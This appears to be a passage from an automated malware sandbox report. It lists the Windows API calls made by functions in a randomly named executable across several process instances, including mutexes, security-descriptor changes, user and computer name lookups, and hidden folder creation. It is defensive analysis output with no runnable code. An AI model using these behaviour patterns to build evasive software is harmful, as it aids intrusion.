xA,GetProcAddress,22_2_012F5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,22_2_01303F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,22_2_012E7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,22_2_012E3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,22_2_012FCE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,22_2_012E1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,22_2_01301690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,25_2_015A6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,25_2_01591170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,25_2_0159D970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,25_2_015B2B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,25_2_015B2BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,25_2_015B25C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,25_2_015AADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,25_2_015B1460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,25_2_015B3CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,25_2_015B3F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,25_2_015A5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,25_2_01597FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,25_2_01591660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,25_2_01593610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,25_2_015ACE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,25_2_015B1690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,27_2_00AE1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,27_2_00AED970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,27_2_00B02BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,27_2_00B02B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,27_2_00B03CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,27_2_00B01460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,27_2_00AFADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,27_2_00B025C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,27_2_00B01690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,27_2_00AE3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,27_2_00AFCE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,27_2_00AE1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,27_2_00AE7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,27_2_00AF5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,27_2_00B03F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,29_2_012A1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,29_2_012AD970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,29_2_012C2B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,29_2_012C2BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,29_2_012BADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,29_2_012C25C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,29_2_012C1460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,29_2_012C3CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,29_2_012B5720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,29_2_012C3F50
